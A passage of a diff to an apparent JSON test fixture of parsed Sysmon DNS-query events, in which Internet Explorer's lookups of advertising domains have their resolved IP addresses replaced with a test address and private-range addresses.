xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.611619700Z'/\u003e\u003cEventRecordID\u003e101\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.005\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eups.analytics.yahoo.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 prod.ups-yahoo.aolp-ds-prd.aws.oath.cloud;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22" }, "winlog": { 
@@ -1700,7 +1700,7 @@ "provider_guid": "{5770385f-c22a-43e0-bf4c-06f5698ffbd9}", "level": "information", "event_data": { - "QueryResults": "type: 5 prod.ups-yahoo.aolp-ds-prd.aws.oath.cloud;::ffff:34.225.20.218;::ffff:3.216.14.125;::ffff:52.200.28.150;::ffff:3.216.103.132;::ffff:52.4.86.222;::ffff:52.21.200.160;::ffff:3.216.249.238;::ffff:3.94.175.146;", + "QueryResults": "type: 5 prod.ups-yahoo.aolp-ds-prd.aws.oath.cloud;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:03.005", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}", 
@@ -1723,7 +1723,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802369600Z'/\u003e\u003cEventRecordID\u003e102\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.070\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003epm.w55c.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 dxedge-prod-lb-946522505.us-east-1.elb.amazonaws.com;::ffff:34.237.248.89;::ffff:35.153.21.25;::ffff:52.200.238.112;::ffff:52.206.93.38;::ffff:34.227.35.137;::ffff:35.169.96.208;::ffff:52.22.206.42;::ffff:52.201.81.61;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802369600Z'/\u003e\u003cEventRecordID\u003e102\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.070\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003epm.w55c.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 dxedge-prod-lb-946522505.us-east-1.elb.amazonaws.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" 
@@ -1746,7 +1746,7 @@ "ProcessId": "2736", "QueryName": "pm.w55c.net", "QueryStatus": "0", - "QueryResults": "type: 5 dxedge-prod-lb-946522505.us-east-1.elb.amazonaws.com;::ffff:34.237.248.89;::ffff:35.153.21.25;::ffff:52.200.238.112;::ffff:52.206.93.38;::ffff:34.227.35.137;::ffff:35.169.96.208;::ffff:52.22.206.42;::ffff:52.201.81.61;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;", + "QueryResults": "type: 5 dxedge-prod-lb-946522505.us-east-1.elb.amazonaws.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe" }, "process": { 
@@ -1762,7 +1762,7 @@ { "@timestamp": "2021-05-05T15:30:51.697Z", "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802391800Z'/\u003e\u003cEventRecordID\u003e103\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.093\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ecm.eyereturn.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:35.186.239.238;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;2001:502:1ca1::30;192.35.51.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802391800Z'/\u003e\u003cEventRecordID\u003e103\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.093\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ecm.eyereturn.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;2001:502:1ca1::30;192.168.51.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" 
@@ -1789,7 +1789,7 @@ "channel": "Microsoft-Windows-Sysmon/Operational", "event_data": { "QueryStatus": "0", - "QueryResults": "::ffff:35.186.239.238;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;2001:502:1ca1::30;192.35.51.30;", + "QueryResults": "::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;2001:502:1ca1::30;192.168.51.30;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:03.093", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}", @@ -1824,7 +1824,7 @@ "event_id": "22", "provider_name": "Microsoft-Windows-Sysmon", "event_data": { - "QueryResults": "type: 5 pagead46.l.doubleclick.net;::ffff:172.217.10.66;", + "QueryResults": "type: 5 pagead46.l.doubleclick.net;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:03.099", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}", 
@@ -1840,7 +1840,7 @@ "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802402000Z'/\u003e\u003cEventRecordID\u003e104\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.099\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ewww.googletagservices.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 pagead46.l.doubleclick.net;::ffff:172.217.10.66;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e" + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802402000Z'/\u003e\u003cEventRecordID\u003e104\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.099\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ewww.googletagservices.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 pagead46.l.doubleclick.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e" } }, { 
@@ -1852,7 +1852,7 @@ "ProcessId": "2736", "QueryName": "cm.adgrx.com", "QueryStatus": "0", - "QueryResults": "type: 5 rtb.adgrx.com;::ffff:173.231.178.117;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;2001:502:1ca1::30;", + "QueryResults": "type: 5 rtb.adgrx.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;2001:502:1ca1::30;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe" }, "channel": "Microsoft-Windows-Sysmon/Operational", 
@@ -1880,7 +1880,7 @@ }, "event": { "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802413000Z'/\u003e\u003cEventRecordID\u003e105\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.107\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ecm.adgrx.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 rtb.adgrx.com;::ffff:173.231.178.117;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;2001:502:1ca1::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802413000Z'/\u003e\u003cEventRecordID\u003e105\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.107\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ecm.adgrx.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 rtb.adgrx.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;2001:502:1ca1::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event" } 
@@ -1903,7 +1903,7 @@ }, "event_data": { "QueryStatus": "0", - "QueryResults": "type: 5 j2waycm.netmng.com;type: 5 j2waycm-us-wdc.netmng.com;::ffff:104.193.83.156;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;", + "QueryResults": "type: 5 j2waycm.netmng.com;type: 5 j2waycm-us-wdc.netmng.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:03.107", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}", 
@@ -1921,7 +1921,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802423900Z'/\u003e\u003cEventRecordID\u003e106\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.107\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ecsm2waycm-atl.netmng.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 j2waycm.netmng.com;type: 5 j2waycm-us-wdc.netmng.com;::ffff:104.193.83.156;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802423900Z'/\u003e\u003cEventRecordID\u003e106\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.107\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ecsm2waycm-atl.netmng.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 j2waycm.netmng.com;type: 5 j2waycm-us-wdc.netmng.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" 
@@ -1991,7 +1991,7 @@ "event_data": { "QueryName": "pr-bh.ybp.yahoo.com", "QueryStatus": "0", - "QueryResults": "type: 5 ds-pr-bh.ybp.gysm.yahoodns.net;::ffff:72.30.2.182;", + "QueryResults": "type: 5 ds-pr-bh.ybp.gysm.yahoodns.net;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:03.112", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}", 
@@ -2002,7 +2002,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802433000Z'/\u003e\u003cEventRecordID\u003e107\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.112\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003epr-bh.ybp.yahoo.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 ds-pr-bh.ybp.gysm.yahoodns.net;::ffff:72.30.2.182;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
